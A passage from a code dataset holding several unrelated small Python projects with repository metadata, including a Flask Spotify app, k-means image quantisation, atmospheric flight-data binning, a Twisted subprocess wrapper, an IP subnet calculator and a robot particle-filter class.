logger.addHandler(logstash.TCPLogstashHandler('logstash', 5000, version=1))\n if SERVER_RUN_MODE == 'DEBUG':\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(log_level)\n return logger\n\n\ndef init_tracer(service):\n config = Config(\n config={\n 'sampler': {\n 'type': 'const',\n 'param': 1,\n },\n 'local_agent': {\n 'reporting_host': \"jaeger\",\n 'reporting_port': 5775,\n },\n 'logging': True,\n 'reporter_batch_size': 1,\n },\n\n service_name=service,\n )\n\n # this call also sets opentracing.tracer\n return config.initialize_tracer()\n","repo_name":"krishnadubba/up_be_falcon","sub_path":"uggipuggi/helpers/logs_metrics.py","file_name":"logs_metrics.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70528524906","text":"import requests\nimport base64\nimport os\nimport random\nfrom dotenv import load_dotenv, find_dotenv\nfrom flask import Flask, render_template\nfrom genius import get_lyric_link\nfrom spotify import get_spotify_response\n\napp = Flask(__name__)\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n@app.route('/')\ndef spotify_app():\n #get the return data from spotify.py\n return_data = get_spotify_response()\n \n # information to display on html\n # list of songs and links to their spotify page\n song_list = []\n song_link_list = []\n for songs in 
return_data['tracks']:\n        song_list.append(songs['name'])\n        song_link_list.append(songs['external_urls']['spotify'])\n    num_songs = len(song_list)\n    \n    # get random track\n    random_track_num = random.randint(1, len(return_data['tracks']))\n    random_track = return_data['tracks'][random_track_num-1]\n    \n    # get the song name\n    song_name = random_track['name']\n    \n    # get all the artists related to this song\n    artists_name = []\n    for artists in random_track['artists']:\n        artists_name.append(artists['name'])\n    \n    # get the link to the album image\n    image_link = random_track['album']['images'][1]['url']\n    \n    # get the song preview url\n    song_preview = random_track['preview_url']\n    \n    # get the link of the song chosen to be previewed\n    song_link = random_track['external_urls']['spotify']\n    \n    # if there is no preview, then give the song_preview variable a string to compare in jinja\n    if song_preview is None:\n        song_preview = \"None\"\n    \n    # get the link to the lyrics using Genius API\n    # lyric_link = get_lyric_link(song_name)\n    \n    # render html file:\n    return render_template(\n        \"index.html\",\n        songName=song_name,\n        artistNames=artists_name,\n        imageLink=image_link,\n        songPreview=song_preview,\n        songLink=song_link,\n        # lyricLink=lyric_link,\n        songList=song_list,\n        numSongs=num_songs,\n        songLinkList=song_link_list)\n\n# run the flask app\napp.run(\n    port=int(os.getenv('PORT', 8080)),\n    host=os.getenv('IP', '0.0.0.0'),\n    debug=True\n)\n\n","repo_name":"NJIT-CS490-SP21/project1-hv72","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"73201489068","text":"import numpy as np\nfrom numpy import linalg\nfrom tqdm import trange\nimport cv2\n\nclass Kmeans(object):\n\n    def __init__(self, source_image, k=16):\n        self.training_x = source_image.copy().reshape(-1, 3)\n        self.label = np.zeros(self.training_x.shape[0])\n        self.mu = np.random.randint(low=0, high=255, size=(k, 3)).astype(np.float64)\n        self.k = k\n\n    def train(self):\n        x = self.training_x\n        epsilon = 1e-5\n        loop_count = 0\n        # run at most 100 iterations\n        for loop in trange(100):\n            loop_count += 1\n            pre_mu = self.mu.copy()\n            # assign each sample to a group\n            for i, xi in enumerate(x):\n                # label sample xi with its nearest group, using the squared L2 norm as the distance metric\n                self.label[i] = np.argmin(linalg.norm(xi - self.mu, axis=1, keepdims=True) ** 2)\n            # update the colour mu_j of each group\n            for j in range(self.k):\n                # only update group j if it has any data points\n                if (self.label == j).any():\n                    self.mu[j] = np.sum(x[self.label == j], axis=0) / np.sum(self.label == j)\n\n            if (linalg.norm(self.mu - pre_mu, axis=1, keepdims=True) < epsilon).all():\n                break\n\n        return loop_count\n\n    def reassign(self, img):\n        new_img = img.copy().astype(np.float64)\n        for i in range(img.shape[0]):\n            for j in range(img.shape[1]):\n                k = np.argmin(linalg.norm(new_img[i][j] - self.mu, axis=1, keepdims=True) ** 2)\n                new_img[i][j] = self.mu[k]\n\n        return new_img\n\nif __name__ == \"__main__\":\n    large_img = cv2.imread('data6/bird_large.tiff')\n    small_img = cv2.imread('data6/bird_small.tiff')\n    for k in [16, 32, 64, 128]:\n        print(f'{k} bit colors')\n        for i in range(10):\n            kmeans = Kmeans(small_img, k=k)\n            kmeans.train()\n            new_img = kmeans.reassign(large_img)\n            cv2.imwrite('data6/bird_large_after_{}_with_k_{}.tiff'.format(i, k), 
np.uint8(np.round(new_img)))\n","repo_name":"cliche9/Machine-Learning-2021-Fall","sub_path":"exp6/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70446887789","text":"# Input the initial and final times to read as time0 and timef.\n# Time range from Lee et al. 2019 (6:20-6:48 UTC)\ndef read_flighttrack( time0, timef ):\n import xarray as xr\n\n # Read in-situ data\n # In-situ not filtered for whole-second values\n #daten = xr.open_dataset('obs/stratoclim2017.geophysika.0808_1.master.ci_eval.nc')\n bd = '/xdisk/sylvia/tropic_vis/'\n daten = xr.open_dataset( bd + 'obs/stratoclim2017.geophysika.0808_1.filtered_per_sec.nc' )\n\n # Extract values between time0 and timef\n zeit = daten['time'].sel( time=slice(time0, timef) )\n alt = daten['BEST:ALT'].sel( time=slice(time0, timef) )\n qv_flash = daten['BEST:H2O_gas'].sel( time=slice(time0, timef) )\n qv_fish = daten['BEST:H2O_enh'].sel( time=slice(time0, timef) )\n qi = daten['BEST:IWC'].sel( time=slice(time0, timef) )\n temp = daten['BEST:TEMP'].sel( time=slice(time0, timef) )\n theta = daten['BEST:THETA'].sel( time=slice(time0, timef) )\n rhice_flash = daten['BEST:RH_ice_gas'].sel( time=slice(time0, timef) )\n rhice_fish = daten['BEST:RH_ice_enh'].sel( time=slice(time0, timef) )\n\n #lat = daten['BEST:LAT'].sel( time=slice(time0, timef) )\n #lon = daten['BEST:LON'].sel( time=slice(time0, timef) )\n #print('In-situ lat min: ' + str(lat.min(skipna=True).values) + ' // In-situ lat max: ' + str(lat.max(skipna=True).values))\n #print('In-situ lon min: ' + str(lon.min(skipna=True).values) + ' // In-situ lon max: ' + str(lon.max(skipna=True).values))\n\n # Extract corresponding altitudes and times for different variables according to their non-zero values\n alt1 = alt.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) ).values\n t1 = zeit.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n qv_flash = qv_flash.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n qv_fish = qv_fish.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n\n alt2 = alt.where( (alt > 0) & (qi > 0) )\n qi = qi.where( (alt > 0) & (qi > 0) )\n\n alt3 = alt.where( (temp > 0) & (theta > 0) )\n temp = temp.where( (temp > 0) & (theta > 0) )\n theta = theta.where( (temp > 0) & (theta > 0) )\n\n alt4 = alt.where( (rhice_flash > 0) & (rhice_fish > 0) )\n rhice_flash = rhice_flash.where( (rhice_flash > 0) & (rhice_fish > 0) )\n rhice_fish = rhice_fish.where( (rhice_flash > 0) & (rhice_fish > 0) )\n\n return alt1, qv_flash, qv_fish, alt2, qi, alt3, temp, theta, alt4, rhice_flash, rhice_fish\n\n\n# Group the flight track values into altitudinal bins from min_alt to max_alt\ndef bin_flighttrack( min_alt, max_alt, alt1, qv_flash, qv_fish, alt2, qi, alt3, temp, theta, alt4, rhice_flash, rhice_fish ):\n import xarray as xr\n import numpy as np\n\n basedir = '/xdisk/sylvia/'\n\n # Define the simulation bins from the vertical grid file\n vgrid = xr.open_dataset(basedir + 'vgrid_icon-grid_tropic_55e115e5s40n.nc')\n alt = vgrid.vct_a.values[:,0]\n j = np.argwhere( (alt >= min_alt) & (alt <= max_alt) )\n bins_sims = alt[j[:,0]]\n\n # Binning in altitude between and with bins, which elements go in which bin?\n # Make a multidimensional list of alt and h2o values in each.\n #u = 14000\n #d = 22000\n #n = 70\n\n # np.digitize returns the indices of the bins to which each element in alt* belongs.\n #i1 = np.digitize( alt1, bins=np.linspace(u,d,n) )\n #i2 = 
np.digitize( alt2, bins=np.linspace(u,d,n) )\n #i3 = np.digitize( alt3, bins=np.linspace(u,d,n) )\n\n # np.digitize returns the indices of the bins to which each element in alt* belongs.\n icon_n = len(bins_sims)\n i1 = np.digitize( alt1, bins=bins_sims )\n i2 = np.digitize( alt2, bins=bins_sims )\n i3 = np.digitize( alt3, bins=bins_sims )\n i4 = np.digitize( alt4, bins=bins_sims )\n\n alt1_list = [ [] for i in np.arange(icon_n) ]\n qv_flash_list = [ [] for i in np.arange(icon_n) ]\n qv_fish_list = [ [] for i in np.arange(icon_n) ]\n\n alt2_list = [ [] for i in np.arange(icon_n) ]\n qi_list = [ [] for i in np.arange(icon_n) ]\n\n alt3_list = [ [] for i in np.arange(icon_n) ]\n temp_list = [ [] for i in np.arange(icon_n) ]\n theta_list = [ [] for i in np.arange(icon_n) ]\n\n alt4_list = [ [] for i in np.arange(icon_n) ]\n RHi_list = [ [] for i in np.arange(icon_n) ]\n\n # Group values into these bins\n for elem_idx, group_idx in enumerate(i1):\n alt1_list[group_idx-1].append( alt1[elem_idx].item() )\n qv_flash_list[group_idx-1].append( qv_flash[elem_idx].item() )\n qv_fish_list[group_idx-1].append( qv_fish[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i2):\n alt2_list[group_idx-1].append( alt2[elem_idx].item() )\n qi_list[group_idx-1].append( qi[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i3):\n alt3_list[group_idx-1].append( alt3[elem_idx].item() )\n temp_list[group_idx-1].append( temp[elem_idx].item() )\n theta_list[group_idx-1].append( theta[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i4):\n alt4_list[group_idx-1].append( alt4[elem_idx].item() )\n RHi_list[group_idx-1].append( rhice_flash[elem_idx].item() )\n\n # Calculate the statistics across all items in a bin if there are at least 5 such items\n temp_SC_stats = np.empty((3, icon_n))\n temp_SC_stats[:] = np.nan\n theta_SC_stats = np.empty((3, icon_n))\n theta_SC_stats[:] = np.nan\n qv_flash_SC_stats = np.empty((3, icon_n))\n qv_flash_SC_stats[:] = np.nan\n qv_fish_SC_stats = np.empty((3, icon_n))\n qv_fish_SC_stats[:] = np.nan\n qi_SC_stats = np.empty((3, icon_n))\n qi_SC_stats[:] = np.nan\n RHi_SC_stats = np.empty((3, icon_n))\n RHi_SC_stats[:] = np.nan\n\n ## This chunk of code is generally commented out as we only need to save\n ## the number of elements in a bin from the in-situ measurements once\n ## These number of elements are used in syn_traj_stats_fixed\n #temp_len = []\n #qv_flash_len = []\n #qi_len = []\n #theta_len = []\n #rhi_len = []\n #for i in np.arange(icon_n):\n # temp_len.append( int(len(temp_list[i])) )\n # qv_flash_len.append( int(len(qv_flash_list[i])) )\n # qi_len.append( int(len(qi_list[i])) )\n # theta_len.append( int(len(theta_list[i])) )\n # rhi_len.append( int(len(RHi_list[i])) )\n #\n ## The whole second set of trajectories (z ~ 22 km) are piled into the last bin.\n ## Remove this bin as we're interested in the vertical profile lower down.\n #temp_len[-1] = 0\n #qv_flash_len[-1] = 0\n #qi_len[-1] = 0\n #theta_len[-1] = 0\n #rhi_len[-1] = 0\n #np.save( basedir + 'output/Stratoclim_temp_len.npy', np.asarray(temp_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_qv_len.npy', np.asarray(qv_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_qi_len.npy', np.asarray(qi_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_theta_len.npy', np.asarray(theta_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_rhi_len.npy', np.asarray(rhi_len, dtype='i4') )\n ##\n\n for i in np.arange(icon_n):\n if (len(temp_list[i]) > 5):\n 
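# Rows 0/1/2 of each *_SC_stats array hold the bin's nanmean/nanmedian/nanstd;\n            # bins with five or fewer samples stay NaN so they can be masked downstream.\n            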
temp_SC_stats[0,i] = np.nanmean( temp_list[i] )\n            temp_SC_stats[1,i] = np.nanmedian( temp_list[i] )\n            temp_SC_stats[2,i] = np.nanstd( temp_list[i] )\n            theta_SC_stats[0,i] = np.nanmean( theta_list[i] )\n            theta_SC_stats[1,i] = np.nanmedian( theta_list[i] )\n            theta_SC_stats[2,i] = np.nanstd( theta_list[i] )\n        if (len(qv_flash_list[i]) > 5):\n            qv_flash_SC_stats[0,i] = np.nanmean( qv_flash_list[i] )\n            qv_flash_SC_stats[1,i] = np.nanmedian( qv_flash_list[i] )\n            qv_flash_SC_stats[2,i] = np.nanstd( qv_flash_list[i] )\n        if (len(qv_fish_list[i]) > 5):\n            qv_fish_SC_stats[0,i] = np.nanmean( qv_fish_list[i] )\n            qv_fish_SC_stats[1,i] = np.nanmedian( qv_fish_list[i] )\n            qv_fish_SC_stats[2,i] = np.nanstd( qv_fish_list[i] )\n        if (len(qi_list[i]) > 5):\n            qi_SC_stats[0,i] = np.nanmean( qi_list[i] )\n            qi_SC_stats[1,i] = np.nanmedian( qi_list[i] )\n            qi_SC_stats[2,i] = np.nanstd( qi_list[i] )\n        if (len(RHi_list[i]) > 5):\n            RHi_SC_stats[0,i] = np.nanmean( RHi_list[i] )\n            RHi_SC_stats[1,i] = np.nanmedian( RHi_list[i] )\n            RHi_SC_stats[2,i] = np.nanstd( RHi_list[i] )\n\n    return bins_sims, temp_SC_stats, theta_SC_stats, qv_flash_SC_stats, qv_fish_SC_stats, qi_SC_stats, RHi_SC_stats\n\n\n# Utility function to retain only the whole-second measurements in the StratoClim data.\ndef trimDataTime():\n    from netCDF4 import num2date, Dataset\n    import xarray as xr\n    import matplotlib.pyplot as plt\n    import sys, time\n\n    basedir = '/xdisk/sylvia/tropic_vis/obs/'\n    fi = basedir + 'stratoclim2017.geophysika.0808_1.master.ci_eval.nc'\n    Stratoclim = Dataset(fi, 'r+')\n\n    daten = num2date(times=Stratoclim.variables['time'][:],units='seconds since 2000-01-01 00:00:00 UTC')\n    # indices to retain associated with whole-second measurements\n    indx = [i for i, d in enumerate(daten) if d.microsecond == 0]\n\n    # recast Stratoclim as an xarray dataset now; Stratoclim2 will hold only whole-second measurements\n    Stratoclim = xr.open_dataset(fi)\n    Stratoclim2 = xr.Dataset()\n\n    # iterate over the variables in the StratoClim file\n    for v in Stratoclim.variables:\n        Stratoclim2[v] = Stratoclim[v].isel(time=indx)\n    Stratoclim2.to_netcdf(basedir + 'stratoclim2017.geophysika.0808_1.filtered_per_sec.nc')\n\n","repo_name":"sylviasullivan/ice-microp-rad","sub_path":"traj/flighttrack.py","file_name":"flighttrack.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"33952979137","text":"from __future__ import unicode_literals\n\nfrom django.core.exceptions import ValidationError\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nimport datetime\n\nclass Trip(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE)\n\tlocation = models.CharField(max_length=100)\n\tdescription = models.CharField(max_length=255)\n\tstart_date = models.DateField()\n\tend_date = models.DateField()\n\tcreated_at = models.DateTimeField(auto_now_add=True)\n\tupdated_at = models.DateTimeField(auto_now=True)\n\nclass Traveler(models.Model):\n\tTraveler_id = models.ForeignKey(User, on_delete=models.CASCADE)\n\tTrip_id = models.ForeignKey(Trip, on_delete=models.CASCADE)\n\ndef clean_date(date, checkdate=None):\n    # resolve the default at call time; datetime.date.today() as a default\n    # argument would be evaluated once, at import\n    if checkdate is None:\n        checkdate = datetime.date.today()\n\n    if not isinstance(date, datetime.date):\n        date = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n\n    if date < checkdate:\n        raise ValidationError(\"You cannot travel into the past.
because rules\")\n \n return date","repo_name":"davidhorst/TravelPlanning","sub_path":"apps/trips/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70912467309","text":"import csv\nimport cmath\nwith open(\"D:\\\\jeshmi\\\\csv_files\\\\quaddata.csv\",\"r\") as file:\n data =list(csv.reader(file))\n for row in data:\n A,B,C=row\n print(row)\n d = ((B**2)-4*A*C)\n if d>0:\n r1=(-B-cmath.sqrt(d))/(2*A) \n r2=(-B+cmath.sqrt(d))/(2*A)\n print(\"root1=\",r1)\n print(\"root2=\",r2)\n elif d==0:\n r=-B/2*A\n print(\"root=\",r)\n else:\n print(\"No root\")\n","repo_name":"jeshmi-hub/Python","sub_path":"quadata.py","file_name":"quadata.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14825454377","text":"\n# package twisted\nfrom twisted.internet import reactor\nfrom twisted.internet.protocol import ProcessProtocol\n \nimport sys\nimport os\nimport threading \nimport time\nfrom buildtools.bt_logging import log\nimport buildtools.os_utils as os_utils\n\nclass _PipeReader(ProcessProtocol):\n\n def __init__(self, asc, process, stdout_callback, stderr_callback, exit_callback):\n self._asyncCommand = asc\n self._cb_stdout = stdout_callback\n self._cb_stderr = stderr_callback\n self._cb_exit = exit_callback\n self.process = process\n\n self.buf = {\n 'stdout': '',\n 'stderr': ''\n }\n self.debug = False\n\n def _processData(self, bid, cb, data):\n if self.debug:\n log.info('%s %s: Received %d bytes', self._logPrefix(), bid, len(data))\n for b in data:\n if b != '\\n' and b != '\\r' and b != '':\n self.buf[bid] += b\n else:\n buf = self.buf[bid].strip()\n if self.debug:\n log.info('buf = %r', buf)\n if buf != '':\n cb(self._asyncCommand, buf)\n self.buf[bid] = ''\n\n def _getRemainingBuf(self):\n return self.buf['stdout'] + self.buf['stderr']\n\n def outReceived(self, data):\n self._processData('stdout', self._cb_stdout, data)\n\n def errReceived(self, data):\n self._processData('stderr', self._cb_stderr, data)\n\n def _logPrefix(self):\n return '[{}#{}]'.format(self._asyncCommand.refName, self.transport.pid)\n\n def inConnectionLost(self):\n log.warn('%s Lost connection to stdin.', self._logPrefix())\n\n def errConnectionLost(self):\n log.warn('%s Lost connection to stderr.', self._logPrefix())\n\n def processEnded(self, code):\n self._asyncCommand.exit_code = code\n self._cb_exit(code, self._getRemainingBuf())\n\n\nclass ReactorManager:\n instance = None\n\n @classmethod\n def Start(cls):\n if cls.instance is None:\n cls.instance = threading.Thread(target=reactor.run, args=(False,))\n cls.instance.daemon = True\n cls.instance.start()\n log.info('Twisted Reactor started.')\n\n @classmethod\n def Stop(cls):\n reactor.stop()\n log.info('Twisted Reactor stopped.')\n\n\nclass AsyncCommand(object):\n\n def __init__(self, command, stdout=None, stderr=None, echo=False, env=None, PTY=False, refName=None, debug=False):\n \n self.echo = echo\n self.command = command\n self.PTY = PTY\n self.stdout_callback = stdout if stdout is not None else self.default_stdout\n self.stderr_callback = stderr if stderr is not None else self.default_stderr\n\n self.env = os_utils._cmd_handle_env(env)\n self.command = os_utils._cmd_handle_args(command)\n\n self.child = None\n self.refName = self.commandName = os.path.basename(self.command[0])\n if refName:\n self.refName = refName\n\n 
self.exit_code = None\n        self.exit_code_handler = self.default_exit_handler\n\n        self.log = log\n\n        self.pipe_reader = None\n        self.debug = debug\n\n    def default_exit_handler(self, code, remainingBuf):\n        if code != 0:\n            if code < 0:\n                strerr = '%s: Received signal %d' % (self.refName, abs(code))\n                if code < -100:\n                    strerr += ' (?!)'\n                self.log.error(strerr)\n            else:\n                self.log.warning('%s exited with code %d: %s', self.refName, code, remainingBuf)\n        else:\n            self.log.info('%s has exited normally.', self.refName)\n\n    def default_stdout(self, ascmd, buf):\n        ascmd.log.info('[%s] %s', ascmd.refName, buf)\n\n    def default_stderr(self, ascmd, buf):\n        ascmd.log.error('[%s] %s', ascmd.refName, buf)\n\n    def Start(self):\n        if self.echo:\n            self.log.info('[ASYNC] $ \"%s\"', '\" \"'.join(self.command))\n        pr = _PipeReader(self, self.child, self.stdout_callback, self.stderr_callback, self.exit_code_handler)\n        pr.debug = self.debug\n        self.child = reactor.spawnProcess(pr, self.command[0], self.command[1:], env=self.env, usePTY=self.PTY)\n        if self.child is None:\n            self.log.error('Failed to start %r.', ' '.join(self.command))\n            return False\n        ReactorManager.Start()\n        return True\n\n    def Stop(self):\n        process = os_utils.find_process(self.child.pid)\n        if process:\n            process.terminate()\n\n    def WaitUntilDone(self):\n        while self.IsRunning():\n            time.sleep(1)\n        return self.exit_code\n\n    def IsRunning(self):\n        # still running while no exit code has been recorded\n        return self.exit_code is None\n\ndef async_cmd(command, stdout=None, stderr=None, env=None):\n    ascmd = AsyncCommand(command, stdout=stdout, stderr=stderr, env=env)\n    ascmd.Start()\n    return ascmd","repo_name":"N3X15/python-build-tools","sub_path":"buildtools/twisted_utils.py","file_name":"twisted_utils.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"41097229021","text":"from __future__ import annotations\nfrom .base_dao import BaseDAO\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n    from dto import FormatsDTO\n\n\nclass FormatDAO(BaseDAO):\n    def create(self, data: FormatsDTO) -> None:\n        \"\"\"Executes data writing to a sqlite table.\"\"\"\n        self._db_gateway.cursor.execute(\n            'INSERT INTO formats (format_name) VALUES (?);', (\n                data.format_name, ))\n        self._db_gateway.connection.commit()\n\n    def get_ids_list(self) -> list[int]:\n        \"\"\"Gets ids from sqlite table.\"\"\"\n        result = self._db_gateway.cursor.execute(\n            'SELECT format_id FROM formats;')\n        # fetchall() returns one-element tuples; unpack them into plain ints\n        final_result: list[int] = [row[0] for row in result.fetchall()]\n        return final_result\n","repo_name":"Kosalexx/Project_1","sub_path":"book_store_db/populate_db/data_access/dao/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"20742663449","text":"\"\"\"\nprint(ip.ip_address(ip_input))\nnet4 = ip.ip_network(f'{ip_input}/{sub_mask}', strict=False)\nnetwork_addr = ip.ip_interface(f'{ip_input}/{sub_mask}')\nprint(network_addr.network)\nprint(net4.netmask)\nprint(net4.hostmask)\nprint(net4.num_addresses)\nprint(net4[1])\nprint(net4[-1])\n#for x in net4.hosts():\n#\tprint(x)\n\"\"\"\n\nip = input(\"Enter the ip address\")\nsubmask = input(\"Enter the submask\")\nnet_bin = []\n\ndef cidr_to_netmask(cidr): ## convert 24 to binary subnet mask\n\tcidr = int(cidr)\n\tmask = (0xffffffff >> (32 - cidr)) << (32 - cidr)\n\treturn (str( (0xff000000 & mask) >> 24) + '.' + str( (0x00ff0000 & mask) >> 16) + '.' + str( (0x0000ff00 & mask) >> 8) + '.' 
+ str( (0x000000ff & mask)))\n\ndef ip_to_binary(ip):\n\tbin_ip = '.'.join([bin(int(x)+256)[3:] for x in ip.split('.')])\n\treturn bin_ip\n\ndef bin_to_ip(bina):\n\tbin_ip= '.'.join(str(int(x, 2)) for x in net_bin)\n\treturn bin_ip\n\ndef network_address_generation(sub_split,ip_split):\n\tfor i in range(0,len(sub_split)):\n\t\tif sub_split[i] == \"11111111\":\n\t\t\tnet_bin.append(ip_split[i])\n\t\telse:\n\t\t\tnet_bin.append(\"00000000\")\n\treturn net_bin\t\n\ndef broadcast_address_gen(submask,network):\n\tflag =0\n\tfor i in range(0,len(submask)):\n\t\tfor j in range(0,len(submask[i])):\n\t\t\tif j == \"1\":\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\t\tif flag == 1:\n\t\t\tbroad.append(\"\")\n\t\telse:\n\t\t\tbroad.append(network[i])\nbin_ip = ip_to_binary(ip)\nbin_meta = cidr_to_netmask(submask)\nbin_sub = ip_to_binary(bin_meta)\n\nip_split = bin_ip.split('.')\nsub_split = bin_sub.split('.')\nnet_bin = network_address_generation(sub_split,ip_split)\nnetwork_addr = bin_to_ip(net_bin)\n\nprint(bin_ip)\nprint(bin_sub)\nprint(network_addr)\n\nbroadcast_addr = broadcast_address_gen(sub_split,net_bin)\n\n\n\n","repo_name":"lekshmir80/IP_Projrct","sub_path":"manual_ip.py","file_name":"manual_ip.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5798651057","text":"import Particle\nimport math\n\nconnected = True\ntry:\n from gopigo import *\nexcept ImportError:\n connected = False\n\nimport sys\nimport time\n\n\nclass Robot:\n def __init__(self, _maze, _speed, _rotationSpeed): #give it a maze as input!\n \n self.maze = _maze\n ###Variables for robot###\n self.x = 5.0 #location, initiliased to zero as the robot initialy has no clue where it is\n self.y = 25.0\n self.orientation = 0.6*(math.pi/2) #[0, 2PI]\n self.prVirtual = Particle.Particle(self.x, self.y, self.orientation) #virtual location for when robot is not connected\n self.pr = Particle.Particle(self.x, self.y, self.orientation) #belief location\n self.pr.set_noise(5.0, 1.0, 1.0) # these are for movement and sense distribution\n \n self.speed = _speed; #Speed with which the robot moves forwards\n self.rotationSpeed = _rotationSpeed; #\n \n self.movement = [0,0] # stores the last movement [length moved, rotation]\n self.measurement = [0.0,0.0,0.0,0.0,0.0] #we can always re evaluate number of points here. DO NOT MAKE ANY HARD CODED LOOPS.\n \n #The following are hard coded values found from measurements of the precision of robot movement. Length of arrays to be determined\n self.moveVar = [0,0,0,0,0] #variance in distance actually moved\n self.moveMean = [0,0,0,0,0]\n self.moveOrientVar = [0,0,0,0,0] #variance in orientation when moving forward\n self.moveOrientMean = [0,0,0,0,0]\n self.orientVar = [0,0,0,0,0] #variance in orientation when rotating\n self.orientMean = [0,0,0,0,0]\n self.measurementVar = [0,0,0,0,0] #variance in orientation when rotating\n self.measurementMean = [0,0,0,0,0]\n self.measurementLimHigh = 1e10 #limit for measurement. Set to some desired value\n self.measurementLimLow = 0\n\n self.distFromSensorToRotCenter = 7.5 #cm\n\n \n\n def move(self):\n if connected:\n self.rotate(self.movement[1])\n self.drive(self.movement[0])\n else:\n self.simulateMove(self.movement[1],self.movement[0])\n return 0\n\n def drive(self, _distance):\n \"\"\"Moves the robot. 
positive values=forward, negative values=backward\"\"\"\n        if connected:\n            distance = _distance #cm INPUT\n            speed = 160 #constant\n            unitSpeed = 11.11 #Units/second CONSTANT\n            cmPrUnit = 1.1483 #Constant\n\n            unitDist = int(round(distance/cmPrUnit)) #Be careful with int and doubles\n            sleepTime = unitDist/unitSpeed * 1.3\n\n            set_speed(speed) \n            enc_tgt(1,1,unitDist)\n            if(_distance > 0):\n                fwd()\n            else:\n                bwd()\n            time.sleep(sleepTime)\n        return 0\n\n    def rotate(self, _angle):\n        \"\"\"Rotate robot. Be aware of sign of angle. We need to figure out if CW is positive\"\"\"\n        if abs(_angle) < 0.001:\n            return 0\n        if connected:\n            if _angle < math.pi:\n                fullCircle = 32 #units\n                partsOfCircle = 2*math.pi/_angle #how big a part of a full circle is rotated. eg 90 degrees = 4\n                sleepTime = 5 #CHANGE BY MEASURE!\n\n                units = int(round(fullCircle/partsOfCircle))\n                set_speed(80) #DO NOT CHANGE UNLESS NEW TESTS ARE MADE WITH ROBOT TO CHECK HOW MANY UNITS GO TO FULL CIRCLE\n                enc_tgt(1,1,units)\n                right_rot() #Choose whether it should be clockwise or counterclockwise\n                time.sleep(sleepTime)\n            else:\n                angle = 2*math.pi-_angle\n                fullCircle = 32 #units\n                partsOfCircle = 2*math.pi/angle #how big a part of a full circle is rotated. eg 90 degrees = 4\n                sleepTime = 5 #CHANGE BY MEASURE!\n\n                units = int(round(fullCircle/partsOfCircle))\n                set_speed(80) #DO NOT CHANGE UNLESS NEW TESTS ARE MADE WITH ROBOT TO CHECK HOW MANY UNITS GO TO FULL CIRCLE\n                enc_tgt(1,1,units)\n                left_rot() #Choose whether it should be clockwise or counterclockwise\n                time.sleep(sleepTime)\n\n\n        return 0\n\n    def measure(self): \n        \"\"\"Updates measurement[] with a series of measurements.\"\"\"\n        if connected:\n            angles = []\n            sleepTime = 0.5 #Set time between measures (has to be there for the program to wait with the next command until rotation is done)\n            '''calculate angles to measure'''\n            for i in range(0, len(self.measurement)):\n                angle = (len(self.measurement)-i-1) * math.pi / (len(self.measurement)-1) # calculates the angles for which the sensors measure\n                angle %= 2*math.pi\n                angles.append(int(round(angle*180/math.pi)))\n\n            ''' perform measurement'''\n            for i in range(0, len(self.measurement)):\n                servo(angles[i])\n                time.sleep(sleepTime)\n                measurement = us_dist(15)\n                if measurement > 150: #hardcoded, not pretty... But is a bit bigger than the diagonal of the maze\n                    self.measurement[i] = -1\n                else:\n                    self.measurement[i] = measurement \n        else:\n            self.measurement = self.simulateMeasurements()\n        return self.measurement\n\n    def updateBelief(self, _particleFilter): #updates x, y and rotation\n        \"\"\"updates x, y and rotation\"\"\"\n        return 0\n\n    def findPath(self):\n        \"\"\"Finds the shortest path out of the maze. 
